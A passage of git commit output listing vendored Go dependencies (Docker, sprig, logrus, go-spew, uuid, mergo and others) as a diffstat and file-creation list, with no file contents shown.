.../docker/volume/local/local_windows.go | 34 + .../docker/docker/volume/store/db.go | 88 + .../docker/docker/volume/store/errors.go | 76 + .../docker/docker/volume/store/restore.go | 83 + .../docker/docker/volume/store/store.go | 649 ++ .../docker/docker/volume/store/store_test.go | 234 + .../docker/docker/volume/store/store_unix.go | 9 + .../docker/volume/store/store_windows.go | 12 + .../docker/volume/testutils/testutils.go | 116 + .../docker/docker/volume/validate.go | 125 + .../docker/docker/volume/validate_test.go | 43 + .../docker/volume/validate_test_unix.go | 8 + .../docker/volume/validate_test_windows.go | 6 + .../github.com/docker/docker/volume/volume.go | 323 + .../docker/docker/volume/volume_copy.go | 23 + .../docker/docker/volume/volume_copy_unix.go | 8 + .../docker/volume/volume_copy_windows.go | 6 + .../docker/docker/volume/volume_linux.go | 56 + .../docker/docker/volume/volume_linux_test.go | 51 + .../docker/volume/volume_propagation_linux.go | 47 + .../volume/volume_propagation_linux_test.go | 65 + .../volume/volume_propagation_unsupported.go | 24 + .../docker/docker/volume/volume_test.go | 269 + .../docker/docker/volume/volume_unix.go | 138 + .../docker/volume/volume_unsupported.go | 16 + .../docker/docker/volume/volume_windows.go | 201 + .../go-ozzo/ozzo-validation/.gitignore | 24 + .../go-ozzo/ozzo-validation/.travis.yml | 16 + .../go-ozzo/ozzo-validation/LICENSE | 17 + .../go-ozzo/ozzo-validation/README.md | 530 ++ .../go-ozzo/ozzo-validation/UPGRADE.md | 46 + .../go-ozzo/ozzo-validation/date.go | 84 + .../go-ozzo/ozzo-validation/date_test.go | 69 + .../go-ozzo/ozzo-validation/error.go | 89 + .../go-ozzo/ozzo-validation/error_test.go | 70 + .../go-ozzo/ozzo-validation/example_test.go | 130 + .../github.com/go-ozzo/ozzo-validation/in.go | 43 + .../go-ozzo/ozzo-validation/in_test.go | 44 + .../go-ozzo/ozzo-validation/is/rules.go | 138 + .../go-ozzo/ozzo-validation/is/rules_test.go | 94 + .../go-ozzo/ozzo-validation/length.go | 77 + .../go-ozzo/ozzo-validation/length_test.go | 90 + .../go-ozzo/ozzo-validation/match.go | 47 + .../go-ozzo/ozzo-validation/match_test.go | 44 + .../go-ozzo/ozzo-validation/minmax.go | 177 + .../go-ozzo/ozzo-validation/minmax_test.go | 137 + .../go-ozzo/ozzo-validation/not_nil.go | 32 + .../go-ozzo/ozzo-validation/not_nil_test.go | 50 + .../go-ozzo/ozzo-validation/required.go | 42 + .../go-ozzo/ozzo-validation/required_test.go | 75 + .../go-ozzo/ozzo-validation/string.go | 48 + .../go-ozzo/ozzo-validation/string_test.go | 106 + .../go-ozzo/ozzo-validation/struct.go | 154 + .../go-ozzo/ozzo-validation/struct_test.go | 137 + .../go-ozzo/ozzo-validation/util.go | 157 + .../go-ozzo/ozzo-validation/util_test.go | 293 + .../go-ozzo/ozzo-validation/validation.go | 133 + .../ozzo-validation/validation_test.go | 145 + vendor/github.com/google/uuid/.travis.yml | 9 + vendor/github.com/google/uuid/CONTRIBUTING.md | 10 + vendor/github.com/google/uuid/CONTRIBUTORS | 9 + vendor/github.com/google/uuid/LICENSE | 27 + vendor/github.com/google/uuid/README.md | 23 + vendor/github.com/google/uuid/dce.go | 80 + vendor/github.com/google/uuid/doc.go | 12 + vendor/github.com/google/uuid/hash.go | 53 + vendor/github.com/google/uuid/json_test.go | 62 + vendor/github.com/google/uuid/marshal.go | 39 + vendor/github.com/google/uuid/node.go | 103 + vendor/github.com/google/uuid/seq_test.go | 66 + vendor/github.com/google/uuid/sql.go | 58 + vendor/github.com/google/uuid/sql_test.go | 102 + vendor/github.com/google/uuid/time.go | 123 + vendor/github.com/google/uuid/util.go | 43 + vendor/github.com/google/uuid/uuid.go | 191 + vendor/github.com/google/uuid/uuid_test.go | 526 ++ vendor/github.com/google/uuid/version1.go | 44 + vendor/github.com/google/uuid/version4.go | 38 + vendor/github.com/huandu/xstrings/.gitignore | 24 + vendor/github.com/huandu/xstrings/.travis.yml | 1 + .../huandu/xstrings/CONTRIBUTING.md | 23 + vendor/github.com/huandu/xstrings/LICENSE | 22 + vendor/github.com/huandu/xstrings/README.md | 114 + vendor/github.com/huandu/xstrings/common.go | 25 + vendor/github.com/huandu/xstrings/convert.go | 364 + .../huandu/xstrings/convert_test.go | 165 + vendor/github.com/huandu/xstrings/count.go | 120 + .../github.com/huandu/xstrings/count_test.go | 62 + vendor/github.com/huandu/xstrings/doc.go | 8 + vendor/github.com/huandu/xstrings/format.go | 170 + .../github.com/huandu/xstrings/format_test.go | 100 + .../github.com/huandu/xstrings/manipulate.go | 217 + .../huandu/xstrings/manipulate_test.go | 142 + .../github.com/huandu/xstrings/translate.go | 547 ++ .../huandu/xstrings/translate_test.go | 96 + .../github.com/huandu/xstrings/util_test.go | 33 + vendor/github.com/imdario/mergo/.gitignore | 33 + vendor/github.com/imdario/mergo/.travis.yml | 7 + .../imdario/mergo/CODE_OF_CONDUCT.md | 46 + vendor/github.com/imdario/mergo/LICENSE | 28 + vendor/github.com/imdario/mergo/README.md | 222 + vendor/github.com/imdario/mergo/doc.go | 44 + .../github.com/imdario/mergo/issue17_test.go | 25 + .../github.com/imdario/mergo/issue23_test.go | 27 + .../github.com/imdario/mergo/issue33_test.go | 33 + .../github.com/imdario/mergo/issue38_test.go | 59 + .../github.com/imdario/mergo/issue50_test.go | 18 + .../github.com/imdario/mergo/issue52_test.go | 99 + .../github.com/imdario/mergo/issue61_test.go | 20 + .../github.com/imdario/mergo/issue64_test.go | 38 + .../github.com/imdario/mergo/issue66_test.go | 48 + vendor/github.com/imdario/mergo/map.go | 174 + vendor/github.com/imdario/mergo/merge.go | 245 + .../imdario/mergo/merge_appendslice_test.go | 33 + vendor/github.com/imdario/mergo/merge_test.go | 50 + vendor/github.com/imdario/mergo/mergo.go | 97 + vendor/github.com/imdario/mergo/mergo_test.go | 733 ++ vendor/github.com/imdario/mergo/pr80_test.go | 18 + vendor/github.com/imdario/mergo/pr81_test.go | 42 + .../imdario/mergo/testdata/license.yml | 4 + .../imdario/mergo/testdata/thing.yml | 6 + 2471 files changed, 356877 insertions(+), 2 deletions(-) create mode 100644 vendor/github.com/Masterminds/semver/.travis.yml create mode 100644 vendor/github.com/Masterminds/semver/CHANGELOG.md create mode 100644 vendor/github.com/Masterminds/semver/LICENSE.txt create mode 100644 vendor/github.com/Masterminds/semver/Makefile create mode 100644 vendor/github.com/Masterminds/semver/README.md create mode 100644 vendor/github.com/Masterminds/semver/appveyor.yml create mode 100644 vendor/github.com/Masterminds/semver/benchmark_test.go create mode 100644 vendor/github.com/Masterminds/semver/collection.go create mode 100644 vendor/github.com/Masterminds/semver/collection_test.go create mode 100644 vendor/github.com/Masterminds/semver/constraints.go create mode 100644 vendor/github.com/Masterminds/semver/constraints_test.go create mode 100644 vendor/github.com/Masterminds/semver/doc.go create mode 100644 vendor/github.com/Masterminds/semver/version.go create mode 100644 vendor/github.com/Masterminds/semver/version_test.go create mode 100644 vendor/github.com/Masterminds/sprig/.gitignore create mode 100644 vendor/github.com/Masterminds/sprig/.travis.yml create mode 100644 vendor/github.com/Masterminds/sprig/CHANGELOG.md create mode 100644 vendor/github.com/Masterminds/sprig/LICENSE.txt create mode 100644 vendor/github.com/Masterminds/sprig/Makefile create mode 100644 vendor/github.com/Masterminds/sprig/README.md create mode 100644 vendor/github.com/Masterminds/sprig/appveyor.yml create mode 100644 vendor/github.com/Masterminds/sprig/crypto.go create mode 100644 vendor/github.com/Masterminds/sprig/crypto_test.go create mode 100644 vendor/github.com/Masterminds/sprig/date.go create mode 100644 vendor/github.com/Masterminds/sprig/date_test.go create mode 100644 vendor/github.com/Masterminds/sprig/defaults.go create mode 100644 vendor/github.com/Masterminds/sprig/defaults_test.go create mode 100644 vendor/github.com/Masterminds/sprig/dict.go create mode 100644 vendor/github.com/Masterminds/sprig/dict_test.go create mode 100644 vendor/github.com/Masterminds/sprig/doc.go create mode 100644 vendor/github.com/Masterminds/sprig/docs/_config.yml create mode 100644 vendor/github.com/Masterminds/sprig/docs/conversion.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/crypto.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/date.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/defaults.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/dicts.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/encoding.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/flow_control.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/index.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/integer_slice.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/lists.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/math.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/os.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/paths.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/reflection.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/semver.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/string_slice.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/strings.md create mode 100644 vendor/github.com/Masterminds/sprig/docs/uuid.md create mode 100644 vendor/github.com/Masterminds/sprig/example_test.go create mode 100644 vendor/github.com/Masterminds/sprig/flow_control_test.go create mode 100644 vendor/github.com/Masterminds/sprig/functions.go create mode 100644 vendor/github.com/Masterminds/sprig/functions_test.go create mode 100644 vendor/github.com/Masterminds/sprig/glide.lock create mode 100644 vendor/github.com/Masterminds/sprig/glide.yaml create mode 100644 vendor/github.com/Masterminds/sprig/list.go create mode 100644 vendor/github.com/Masterminds/sprig/list_test.go create mode 100644 vendor/github.com/Masterminds/sprig/numeric.go create mode 100644 vendor/github.com/Masterminds/sprig/numeric_test.go create mode 100644 vendor/github.com/Masterminds/sprig/reflect.go create mode 100644 vendor/github.com/Masterminds/sprig/reflect_test.go create mode 100644 vendor/github.com/Masterminds/sprig/regex.go create mode 100644 vendor/github.com/Masterminds/sprig/regex_test.go create mode 100644 vendor/github.com/Masterminds/sprig/semver.go create mode 100644 vendor/github.com/Masterminds/sprig/semver_test.go create mode 100644 vendor/github.com/Masterminds/sprig/strings.go create mode 100644 vendor/github.com/Masterminds/sprig/strings_test.go create mode 100644 vendor/github.com/Sirupsen/logrus/.gitignore create mode 100644 vendor/github.com/Sirupsen/logrus/.travis.yml create mode 100644 vendor/github.com/Sirupsen/logrus/CHANGELOG.md create mode 100644 vendor/github.com/Sirupsen/logrus/LICENSE create mode 100644 vendor/github.com/Sirupsen/logrus/README.md create mode 100644 vendor/github.com/Sirupsen/logrus/alt_exit.go create mode 100644 vendor/github.com/Sirupsen/logrus/alt_exit_test.go create mode 100644 vendor/github.com/Sirupsen/logrus/appveyor.yml create mode 100644 vendor/github.com/Sirupsen/logrus/doc.go create mode 100644 vendor/github.com/Sirupsen/logrus/entry.go create mode 100644 vendor/github.com/Sirupsen/logrus/entry_test.go create mode 100644 vendor/github.com/Sirupsen/logrus/example_basic_test.go create mode 100644 vendor/github.com/Sirupsen/logrus/example_hook_test.go create mode 100644 vendor/github.com/Sirupsen/logrus/exported.go create mode 100644 vendor/github.com/Sirupsen/logrus/formatter.go create mode 100644 vendor/github.com/Sirupsen/logrus/formatter_bench_test.go create mode 100644 vendor/github.com/Sirupsen/logrus/hook_test.go create mode 100644 vendor/github.com/Sirupsen/logrus/hooks.go create mode 100644 vendor/github.com/Sirupsen/logrus/hooks/syslog/README.md create mode 100644 vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog.go create mode 100644 vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog_test.go create mode 100644 vendor/github.com/Sirupsen/logrus/hooks/test/test.go create mode 100644 vendor/github.com/Sirupsen/logrus/hooks/test/test_test.go create mode 100644 vendor/github.com/Sirupsen/logrus/json_formatter.go create mode 100644 vendor/github.com/Sirupsen/logrus/json_formatter_test.go create mode 100644 vendor/github.com/Sirupsen/logrus/logger.go create mode 100644 vendor/github.com/Sirupsen/logrus/logger_bench_test.go create mode 100644 vendor/github.com/Sirupsen/logrus/logrus.go create mode 100644 vendor/github.com/Sirupsen/logrus/logrus_test.go create mode 100644 vendor/github.com/Sirupsen/logrus/terminal_bsd.go create mode 100644 vendor/github.com/Sirupsen/logrus/terminal_check_appengine.go create mode 100644 vendor/github.com/Sirupsen/logrus/terminal_check_notappengine.go create mode 100644 vendor/github.com/Sirupsen/logrus/terminal_linux.go create mode 100644 vendor/github.com/Sirupsen/logrus/text_formatter.go create mode 100644 vendor/github.com/Sirupsen/logrus/text_formatter_test.go create mode 100644 vendor/github.com/Sirupsen/logrus/writer.go create mode 100644 vendor/github.com/aokoli/goutils/.travis.yml create mode 100644 vendor/github.com/aokoli/goutils/CHANGELOG.md create mode 100644 vendor/github.com/aokoli/goutils/LICENSE.txt create mode 100644 vendor/github.com/aokoli/goutils/README.md create mode 100644 vendor/github.com/aokoli/goutils/appveyor.yml create mode 100644 vendor/github.com/aokoli/goutils/randomstringutils.go create mode 100644 vendor/github.com/aokoli/goutils/randomstringutils_test.go create mode 100644 vendor/github.com/aokoli/goutils/stringutils.go create mode 100644 vendor/github.com/aokoli/goutils/stringutils_test.go create mode 100644 vendor/github.com/aokoli/goutils/wordutils.go create mode 100644 vendor/github.com/aokoli/goutils/wordutils_test.go create mode 100644 vendor/github.com/davecgh/go-spew/.gitignore create mode 100644 vendor/github.com/davecgh/go-spew/.travis.yml create mode 100644 vendor/github.com/davecgh/go-spew/LICENSE create mode 100644 vendor/github.com/davecgh/go-spew/README.md create mode 100644 vendor/github.com/davecgh/go-spew/cov_report.sh create mode 100644 vendor/github.com/davecgh/go-spew/spew/bypass.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/bypasssafe.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/common.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/common_test.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/config.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/doc.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/dump.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/dump_test.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/dumpcgo_test.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/dumpnocgo_test.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/example_test.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/format.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/format_test.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/internal_test.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/internalunsafe_test.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/spew.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/spew_test.go create mode 100644 vendor/github.com/davecgh/go-spew/spew/testdata/dumpcgo.go create mode 100644 vendor/github.com/davecgh/go-spew/test_coverage.txt create mode 100644 vendor/github.com/docker/docker/.dockerignore create mode 100644 vendor/github.com/docker/docker/.github/ISSUE_TEMPLATE.md create mode 100644 vendor/github.com/docker/docker/.github/PULL_REQUEST_TEMPLATE.md create mode 100644 vendor/github.com/docker/docker/.gitignore create mode 100644 vendor/github.com/docker/docker/.mailmap create mode 100644 vendor/github.com/docker/docker/AUTHORS create mode 100644 vendor/github.com/docker/docker/CHANGELOG.md create mode 100644 vendor/github.com/docker/docker/CONTRIBUTING.md create mode 100644 vendor/github.com/docker/docker/Dockerfile create mode 100644 vendor/github.com/docker/docker/Dockerfile.aarch64 create mode 100644 vendor/github.com/docker/docker/Dockerfile.armhf create mode 100644 vendor/github.com/docker/docker/Dockerfile.ppc64le create mode 100644 vendor/github.com/docker/docker/Dockerfile.s390x create mode 100644 vendor/github.com/docker/docker/Dockerfile.simple create mode 100644 vendor/github.com/docker/docker/Dockerfile.solaris create mode 100644 vendor/github.com/docker/docker/Dockerfile.windows create mode 100644 vendor/github.com/docker/docker/LICENSE create mode 100644 vendor/github.com/docker/docker/MAINTAINERS create mode 100644 vendor/github.com/docker/docker/Makefile create mode 100644 vendor/github.com/docker/docker/NOTICE create mode 100644 vendor/github.com/docker/docker/README.md create mode 100644 vendor/github.com/docker/docker/ROADMAP.md create mode 100644 vendor/github.com/docker/docker/VENDORING.md create mode 100644 vendor/github.com/docker/docker/VERSION create mode 100644 vendor/github.com/docker/docker/api/README.md create mode 100644 vendor/github.com/docker/docker/api/common.go create mode 100644 vendor/github.com/docker/docker/api/common_test.go create mode 100644 vendor/github.com/docker/docker/api/common_unix.go create mode 100644 vendor/github.com/docker/docker/api/common_windows.go create mode 100644 vendor/github.com/docker/docker/api/errors/errors.go create mode 100644 vendor/github.com/docker/docker/api/fixtures/keyfile create mode 100644 vendor/github.com/docker/docker/api/server/httputils/decoder.go create mode 100644 vendor/github.com/docker/docker/api/server/httputils/errors.go create mode 100644 vendor/github.com/docker/docker/api/server/httputils/form.go create mode 100644 vendor/github.com/docker/docker/api/server/httputils/form_test.go create mode 100644 vendor/github.com/docker/docker/api/server/httputils/httputils.go create mode 100644 vendor/github.com/docker/docker/api/server/httputils/httputils_write_json.go create mode 100644 vendor/github.com/docker/docker/api/server/httputils/httputils_write_json_go16.go create mode 100644 vendor/github.com/docker/docker/api/server/middleware.go create mode 100644 vendor/github.com/docker/docker/api/server/middleware/cors.go create mode 100644 vendor/github.com/docker/docker/api/server/middleware/debug.go create mode 100644 vendor/github.com/docker/docker/api/server/middleware/experimental.go create mode 100644 vendor/github.com/docker/docker/api/server/middleware/middleware.go create mode 100644 vendor/github.com/docker/docker/api/server/middleware/version.go create mode 100644 vendor/github.com/docker/docker/api/server/middleware/version_test.go create mode 100644 vendor/github.com/docker/docker/api/server/profiler.go create mode 100644 vendor/github.com/docker/docker/api/server/router/build/backend.go create mode 100644 vendor/github.com/docker/docker/api/server/router/build/build.go create mode 100644 vendor/github.com/docker/docker/api/server/router/build/build_routes.go create mode 100644 vendor/github.com/docker/docker/api/server/router/checkpoint/backend.go create mode 100644 vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint.go create mode 100644 vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint_routes.go create mode 100644 vendor/github.com/docker/docker/api/server/router/container/backend.go create mode 100644 vendor/github.com/docker/docker/api/server/router/container/container.go create mode 100644 vendor/github.com/docker/docker/api/server/router/container/container_routes.go create mode 100644 vendor/github.com/docker/docker/api/server/router/container/copy.go create mode 100644 vendor/github.com/docker/docker/api/server/router/container/exec.go create mode 100644 vendor/github.com/docker/docker/api/server/router/container/inspect.go create mode 100644 vendor/github.com/docker/docker/api/server/router/experimental.go create mode 100644 vendor/github.com/docker/docker/api/server/router/image/backend.go create mode 100644 vendor/github.com/docker/docker/api/server/router/image/image.go create mode 100644 vendor/github.com/docker/docker/api/server/router/image/image_routes.go create mode 100644 vendor/github.com/docker/docker/api/server/router/local.go create mode 100644 vendor/github.com/docker/docker/api/server/router/network/backend.go create mode 100644 vendor/github.com/docker/docker/api/server/router/network/filter.go create mode 100644 vendor/github.com/docker/docker/api/server/router/network/network.go create mode 100644 vendor/github.com/docker/docker/api/server/router/network/network_routes.go create mode 100644 vendor/github.com/docker/docker/api/server/router/plugin/backend.go create mode 100644 vendor/github.com/docker/docker/api/server/router/plugin/plugin.go create mode 100644 vendor/github.com/docker/docker/api/server/router/plugin/plugin_routes.go create mode 100644 vendor/github.com/docker/docker/api/server/router/router.go create mode 100644 vendor/github.com/docker/docker/api/server/router/swarm/backend.go create mode 100644 vendor/github.com/docker/docker/api/server/router/swarm/cluster.go create mode 100644 vendor/github.com/docker/docker/api/server/router/swarm/cluster_routes.go create mode 100644 vendor/github.com/docker/docker/api/server/router/system/backend.go create mode 100644 vendor/github.com/docker/docker/api/server/router/system/system.go create mode 100644 vendor/github.com/docker/docker/api/server/router/system/system_routes.go create mode 100644 vendor/github.com/docker/docker/api/server/router/volume/backend.go create mode 100644 vendor/github.com/docker/docker/api/server/router/volume/volume.go create mode 100644 vendor/github.com/docker/docker/api/server/router/volume/volume_routes.go create mode 100644 vendor/github.com/docker/docker/api/server/router_swapper.go create mode 100644 vendor/github.com/docker/docker/api/server/server.go create mode 100644 vendor/github.com/docker/docker/api/server/server_test.go create mode 100644 vendor/github.com/docker/docker/api/swagger-gen.yaml create mode 100644 vendor/github.com/docker/docker/api/swagger.yaml create mode 100644 vendor/github.com/docker/docker/api/templates/server/operation.gotmpl create mode 100644 vendor/github.com/docker/docker/api/types/auth.go create mode 100644 vendor/github.com/docker/docker/api/types/backend/backend.go create mode 100644 vendor/github.com/docker/docker/api/types/blkiodev/blkio.go create mode 100644 vendor/github.com/docker/docker/api/types/client.go create mode 100644 vendor/github.com/docker/docker/api/types/configs.go create mode 100644 vendor/github.com/docker/docker/api/types/container/config.go create mode 100644 vendor/github.com/docker/docker/api/types/container/container_create.go create mode 100644 vendor/github.com/docker/docker/api/types/container/container_update.go create mode 100644 vendor/github.com/docker/docker/api/types/container/container_wait.go create mode 100644 vendor/github.com/docker/docker/api/types/container/host_config.go create mode 100644 vendor/github.com/docker/docker/api/types/container/hostconfig_unix.go create mode 100644 vendor/github.com/docker/docker/api/types/container/hostconfig_windows.go create mode 100644 vendor/github.com/docker/docker/api/types/error_response.go create mode 100644 vendor/github.com/docker/docker/api/types/events/events.go create mode 100644 vendor/github.com/docker/docker/api/types/filters/parse.go create mode 100644 vendor/github.com/docker/docker/api/types/filters/parse_test.go create mode 100644 vendor/github.com/docker/docker/api/types/id_response.go create mode 100644 vendor/github.com/docker/docker/api/types/image_summary.go create mode 100644 vendor/github.com/docker/docker/api/types/mount/mount.go create mode 100644 vendor/github.com/docker/docker/api/types/network/network.go create mode 100644 vendor/github.com/docker/docker/api/types/plugin.go create mode 100644 vendor/github.com/docker/docker/api/types/plugin_device.go create mode 100644 vendor/github.com/docker/docker/api/types/plugin_env.go create mode 100644 vendor/github.com/docker/docker/api/types/plugin_interface_type.go create mode 100644 vendor/github.com/docker/docker/api/types/plugin_mount.go create mode 100644 vendor/github.com/docker/docker/api/types/plugin_responses.go create mode 100644 vendor/github.com/docker/docker/api/types/port.go create mode 100644 vendor/github.com/docker/docker/api/types/reference/image_reference.go create mode 100644 vendor/github.com/docker/docker/api/types/reference/image_reference_test.go create mode 100644 vendor/github.com/docker/docker/api/types/registry/authenticate.go create mode 100644 vendor/github.com/docker/docker/api/types/registry/registry.go create mode 100644 vendor/github.com/docker/docker/api/types/seccomp.go create mode 100644 vendor/github.com/docker/docker/api/types/service_update_response.go create mode 100644 vendor/github.com/docker/docker/api/types/stats.go create mode 100644 vendor/github.com/docker/docker/api/types/strslice/strslice.go create mode 100644 vendor/github.com/docker/docker/api/types/strslice/strslice_test.go create mode 100644 vendor/github.com/docker/docker/api/types/swarm/common.go create mode 100644 vendor/github.com/docker/docker/api/types/swarm/container.go create mode 100644 vendor/github.com/docker/docker/api/types/swarm/network.go create mode 100644 vendor/github.com/docker/docker/api/types/swarm/node.go create mode 100644 vendor/github.com/docker/docker/api/types/swarm/secret.go create mode 100644 vendor/github.com/docker/docker/api/types/swarm/service.go create mode 100644 vendor/github.com/docker/docker/api/types/swarm/swarm.go create mode 100644 vendor/github.com/docker/docker/api/types/swarm/task.go create mode 100644 vendor/github.com/docker/docker/api/types/time/duration_convert.go create mode 100644 vendor/github.com/docker/docker/api/types/time/duration_convert_test.go create mode 100644 vendor/github.com/docker/docker/api/types/time/timestamp.go create mode 100644 vendor/github.com/docker/docker/api/types/time/timestamp_test.go create mode 100644 vendor/github.com/docker/docker/api/types/types.go create mode 100644 vendor/github.com/docker/docker/api/types/versions/README.md create mode 100644 vendor/github.com/docker/docker/api/types/versions/compare.go create mode 100644 vendor/github.com/docker/docker/api/types/versions/compare_test.go create mode 100644 vendor/github.com/docker/docker/api/types/versions/v1p19/types.go create mode 100644 vendor/github.com/docker/docker/api/types/versions/v1p20/types.go create mode 100644 vendor/github.com/docker/docker/api/types/volume.go create mode 100644 vendor/github.com/docker/docker/api/types/volume/volumes_create.go create mode 100644 vendor/github.com/docker/docker/api/types/volume/volumes_list.go create mode 100644 vendor/github.com/docker/docker/builder/builder.go create mode 100644 vendor/github.com/docker/docker/builder/context.go create mode 100644 vendor/github.com/docker/docker/builder/context_test.go create mode 100644 vendor/github.com/docker/docker/builder/context_unix.go create mode 100644 vendor/github.com/docker/docker/builder/context_windows.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/bflag.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/bflag_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/builder.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/builder_unix.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/builder_windows.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/command/command.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/dispatchers.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/dispatchers_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/envVarTest create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/evaluator.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/evaluator_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/evaluator_unix.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/evaluator_windows.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/internals.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/internals_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/internals_unix.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/internals_windows.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/internals_windows_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/dumper/main.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/json_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/line_parsers.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/parser.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/parser_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfile-line/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/env_no_value/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/shykes-nested-json/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/Dockerfile create mode 100644 